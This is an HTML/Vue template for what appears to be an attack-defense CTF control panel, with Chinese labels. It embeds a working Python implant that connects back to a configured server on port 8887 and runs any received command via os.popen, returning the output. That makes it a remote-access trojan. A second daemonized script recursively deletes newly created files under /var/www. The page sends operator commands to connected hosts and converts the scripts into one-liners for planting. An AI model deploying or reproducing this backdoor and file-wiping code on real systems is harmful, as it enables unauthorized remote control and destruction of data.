<div class="am-form" id ="pony-box">
    <ul class="am-avg-sm-7 am-thumbnails pony-box">

    <div class="am-form-group">
        <label for="pc_src">指令</label>
        <textarea id="txt_run" rows="7" v-model="cmd"></textarea>
        <button id="btn_run" v-on:click="run">执行</button>
    </div>

    <div class="am-form-group">
        <label for="pc_src">反馈</label>
        <ul>
            <li v-for="item in cmd_results">
                <p>IP:{{item[0]}}</p>
                <pre>{{item[1]}}</pre>
            </li>
        </ul>
    </div>

    当前在线：
    <ul>
        <li v-for="item in items">
            <div>
                {{ item }}<br>
            </div>
        </li>
    </ul>

    <div class="am-form-group">
        <label for="pc_src">定时心跳+回报flag脚本</label>
        <textarea id="pc_src" debounce="500" v-model="source" rows="7">
import os, json, zlib, time, socket

sock = None

def connect():
    global sock
    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.connect(('${config.SPEC['SERV_HOST']}', 8887))

def send(data):
    raw = zlib.compress(json.dumps(data))
    sock.send('%d\n%s' % (len(raw), raw))

def recv_until(sock, ch):
    data = []
    while True:
        r = sock.recv(1)
        if r != ch:
            if r.isdigit():
                data.append(r)
            else:
                print(ord(r))
                data = []
                time.sleep(3)
        else: break
    return ''.join(data)

while True:
    try:
        connect()
        send({'msg': 'online'})

        while True:
            dlen = recv_until(sock, '\n')
            raw = sock.recv(int(dlen))
            data = json.loads(zlib.decompress(raw))

            print(data)
            if data['msg'] == 'cmd':
                ret = os.popen(data['data']).read()
                send({'msg': 'cmd_result', 'data': ret})
            time.sleep(1)
    except:
        time.sleep(5)
        print('reconnecting ...')
    finally:
        sock.close()
</textarea>
    </div>

    <div class="am-form-group">
        <label for="pc_src">一句话：定时心跳+回报flag脚本</label>
        <textarea id="pc_src" debounce="500" rows="3">{{ one_line }}</textarea>
    </div>

    <div class="am-form-group">
        <label for="pc_src">自动删文件（daemon版本）</label>
        <textarea id="pc_src" debounce="500" v-model="source2" rows="7">
# coding:utf-8

import os
import time
from os.path import join

BC =  time.time()
WN = ['infoconfig.php', 'Template.class.php']

def arm(d):
    for i in os.listdir(d):
        fn = join(d, i)
        stat = os.stat(fn)

        if os.path.isdir(fn):
            arm(fn)
        else:
            if BC and stat.st_ctime > BC:
                 if not i in WN:
                     os.remove(fn)


pid = int(os.getpid())

def _do_wtf():
    arm("/var/www")
    time.sleep(1)

def daemon():
    pid = os.fork()
    if pid != 0:
        os._exit(0)
        return
    while 1: _do_wtf()

daemon()</textarea>
    </div>

</div>

<%block name="script">
<script>
    (function() {
        var the_data = {};
        var recent = [];
        var lost = [];
        var _new = [];

        var demo = new Vue({
            el: '#pony-box',
            data: {
                recent: recent,
                lost: lost,
                _new: _new,
                source: the_data.source,
                one_line: the_data.one_line,
                source2: the_data.source2,
                one_line2: the_data.one_line2,
                items: [],
                cmd: '',
                cmd_results: [],
            },
            methods: {
                run: function () {
                    $.get("${ url_for("j_rat_cmd") }", {'cmd': this.cmd}, function(ret) {
                        demo.$set('cmd', '');
                    });
                }
            },
            watch: {
                source: function (val, oldVal) {
                    self = this;
                    $.post("${ url_for('j_pycode') }", {txt: val}, function(ret) {
                        self.pack = ret.pack;
                        self.one_line = ret.one_line;
                    });
                },
                source2: function (val, oldVal) {
                    self = this;
                    $.post("${ url_for('j_pycode') }", {txt: val}, function(ret) {
                        self.pack2 = ret.pack;
                        self.one_line2 = ret.one_line;
                    });
                },
            },
        });

        setInterval(function() {
            $.get("${ url_for("j_rat_info") }", function(ret) {
                demo.$set('items', ret.data);
            });
        }, 1000);

        setInterval(function() {
            $.get("${ url_for("j_rat_cmd_result") }", function(ret) {
                for (var i in ret.data) {
                    demo.cmd_results.splice(0, 0, ret.data[i]);
                }
            });
        }, 1000);

	})();
</script>
</%block>
